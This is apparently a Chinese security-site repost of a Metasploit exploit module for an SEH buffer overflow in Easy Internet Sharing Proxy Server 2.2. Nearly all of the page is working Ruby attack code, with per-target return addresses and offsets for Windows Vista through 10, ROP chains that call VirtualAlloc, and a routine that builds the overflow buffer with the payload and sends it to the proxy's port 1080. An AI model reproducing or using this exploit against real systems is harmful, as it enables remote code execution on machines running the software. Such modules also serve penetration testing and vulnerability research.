首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Easy Internet Sharing Proxy Server 2.2 - SEH Overflow (Metasploit) 来源：metasploit.com 作者：Turben 发布时间：2016-11-16   ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class MetasploitModule < Msf::Exploit::Remote   Rank = NormalRanking     include Msf::Exploit::Remote::Tcp   include Msf::Exploit::Seh     def initialize(info = {})     super(update_info(info,       'Name'           => 'Easy Internet Sharing Proxy Server 2.2 SEH buffer Overflow',       'Description'    => %q{         This module exploits a SEH buffer overflow in the Easy Internet Sharing Proxy Socks Server 2.2       },       'Platform'       => 'win',       'Author'         =>         [           'tracyturben[at]gmail.com'         ],       'License'        => MSF_LICENSE,       'References'     =>         [           [ %w{URL http://www.sharing-file.com/products.htm}]         ],       'Privileged'     => false,         'Payload'        =>         {           'Space'           => 836,           'BadChars' => '\x90\x3b\x0d\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c',           'StackAdjustment' => -3500,         },       'Targets'=>         [           [ 'Windows 10 32bit', { 'Ret' => 0x0043AD2C,'Offset' => 836,'Nops' => 44 } ],           [ 'Windows 8.1 32bit SP1', { 'Ret' => 0x0043AD30,'Offset' => 908 } ],           [ 'Windows 7 32bit SP1', { 'Ret' => 0x0043AD38,'Offset' => 884 } ],           [ 'Windows Vista 32bit SP2 ', { 'Ret' => 0x0043AD38,'Offset' => 864 } ]         ],       'DefaultOptions'=>{       'RPORT'=> 1080,       'EXITFUNC'=> 'thread'         },       'DisclosureDate' => 'Nov 10 2016',       'DefaultTarget'=> 0)) end     def exploit     connect     rop_gadgets =''       if target.name =~ /Vista 32bit/        print_good("Building Windows Vista Rop Chain")      rop_gadgets =      [       0x0043fb03,       0x0043fb03,       0x0043fb03,       0x0043fb03,       0x0043fb03,       0x00454559,  # POP EAX # RETN [easyproxy.exe]       0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]       0x00462589,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]       0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]       0x004543b2,  # POP EBP # RETN [easyproxy.exe]       0x41414141,  # Filler (RETN offset compensation)       0x00417771,  # & push esp # ret 0x1C [easyproxy.exe]       0x0046764d,  # POP EBX # RETN [easyproxy.exe]       0x00000001,  # 0x00000001-> ebx       0x004532e5,  # POP EBX # RETN [easyproxy.exe]       0x00001000,  # 0x00001000-> edx       0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]       0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]       0x00000001,  # size       0x00486fac,  # POP ECX # RETN [easyproxy.exe]       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x00000040,  # 0x00000040-> ecx       0x0044fc45,  # POP EDI # RETN [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0045460d,  # POP EAX # RETN [easyproxy.exe]       0x90909090,  # nop       0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]    ].flatten.pack('V*')      print_good('Building Exploit...')    sploit = "\x90" *46    sploit << rop_gadgets    sploit << payload.encoded    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)    sploit << generate_seh_record(target.ret)    print_good('Sending exploit...')    sock.put(sploit)      print_good('Exploit Sent...')      handler      disconnect end      if target.name =~ /7 32bit/         print_good('Building Windows 7 Rop Chain')       rop_gadgets =     [       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0047da72,  # POP EAX # RETN [easyproxy.exe]       0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]       0x004510a3,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]       0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]       0x00450e40,  # POP EBP # RETN [easyproxy.exe]       0x41414141,  # Filler (RETN offset compensation)       0x00417865,  # & push esp # ret 0x1C [easyproxy.exe]       0x0046934a,  # POP EBX # RETN [easyproxy.exe]       0x00000001,  # 0x00000001-> ebx       0x0045a5b4,  # POP EBX # RETN [easyproxy.exe]       0x00001000,  # 0x00001000-> edx       0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]       0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]       0x00000001,  # size       0x0047a3bf,  # POP ECX # RETN [easyproxy.exe]       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x00000040,  # 0x00000040-> ecx       0x00453ce6,  # POP EDI # RETN [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x00478ecd,  # POP EAX # RETN [easyproxy.exe]       0x90909090,  # nop       0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]     ].flatten.pack('V*')       print_good('Building Exploit...')     sploit = "\x90" *26     sploit << rop_gadgets     sploit << payload.encoded     sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)     sploit << generate_seh_record(target.ret)     print_good('Sending exploit...')     sock.put(sploit)       print_good('Exploit Sent...')     sleep(5)     handler       disconnect   end      if target.name =~ /8.1 32bit/       print_good('Building Windows 8 Rop Chain')       rop_gadgets =     [       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0047da72,  # POP EAX # RETN [easyproxy.exe]       0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]       0x004510a3,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [easyproxy.exe]       0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]       0x00450e40,  # POP EBP # RETN [easyproxy.exe]       0x41414141,  # Filler (RETN offset compensation)       0x00417865,  # & push esp # ret 0x1C [easyproxy.exe]       0x0046934a,  # POP EBX # RETN [easyproxy.exe]       0x00000001,  # 0x00000001-> ebx       0x0045a5b4,  # POP EBX # RETN [easyproxy.exe]       0x00001000,  # 0x00001000-> edx       0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]       0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]       0x00000001,  # size       0x0047a3bf,  # POP ECX # RETN [easyproxy.exe]       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x00000040,  # 0x00000040-> ecx       0x00453ce6,  # POP EDI # RETN [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x00478ecd,  # POP EAX # RETN [easyproxy.exe]       0x90909090,  # nop       0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]       ].flatten.pack('V*')       print_good('Building Exploit...')     sploit = "\x90" *2     sploit << rop_gadgets     sploit << payload.encoded     sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)     sploit << generate_seh_record(target.ret)     print_good('Sending exploit...')     sock.put(sploit)     print_good('Exploit Sent...')     handler       disconnect     end       if target.name =~ /10 32bit/           print_good('Building Windows 10 Rop Chain')       rop_gadgets =     [       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x0047f1de,  # POP EBX # RETN [easyproxy.exe]       0x00489210,  # ptr to &VirtualAlloc() [IAT easyproxy.exe]       0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]       0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]       0x41414141,  # Filler (compensate)       0x00438d30,  # MOV EAX,DWORD PTR DS:[EDX] # RETN [easyproxy.exe]       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x004768eb,  # PUSH EAX # POP ESI # RETN 0x04 [easyproxy.exe]       0x004676b0,  # POP EBP # RETN [easyproxy.exe]       0x41414141,  # Filler (RETN offset compensation)       0x00417771,  # & push esp # ret 0x1C [easyproxy.exe]       0x0046bf38,  # POP EBX # RETN [easyproxy.exe]       0x00000001,  # 0x00000001-> ebx       0x00481477,  # POP EBX # RETN [easyproxy.exe]       0x00001000,  # 0x00001000-> edx       0x0045a4ec,  # XOR EDX,EDX # RETN [easyproxy.exe]       0x0045276e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [easyproxy.exe]       0x00000001,  # Filler (compensate)       0x00488098,  # POP ECX # RETN [easyproxy.exe]       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x41414141,  # Filler (RETN offset compensation)       0x00000040,  # 0x00000040-> ecx       0x0044ca38,  # POP EDI # RETN [easyproxy.exe]       0x0043fb03,  # RETN (ROP NOP) [easyproxy.exe]       0x00454559,  # POP EAX # RETN [easyproxy.exe]       0x90909090,  # nop       0x0047d30f,  # PUSHAD # ADD AL,0 # RETN [easyproxy.exe]     ].flatten.pack('V*')       print_good('Building Exploit...')     sploit = "\x90" *2     sploit << rop_gadgets     sploit << payload.encoded     sploit << make_nops(target['Nops'])     sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)     sploit << generate_seh_record(target.ret)     print_good('Sending exploit...')     sock.put(sploit)       print_good('Exploit Sent...')       handler         disconnect     end  end end   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·BlackNurse Spoofed ICMP Denial ·Microsoft Edge 11.0.10240.1638 ·Trend Micro Smart Protection S ·Linux Kernel (Ubuntu / RedHat) ·phpWebAdmin 1.0 SQL Injection ·Microsoft Windows - VHDMP Arbi ·txtforum 1.0.4 Remote Command ·Microsoft Windows - VHDMP ZwDe ·Linux Kernel 4.4 (Ubuntu 16.04 ·Microsoft Windows - VHDMP Arbi ·Disk Pulse Enterprise 9.0.34 - ·WinaXe 7.7 FTP Client - Remote   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved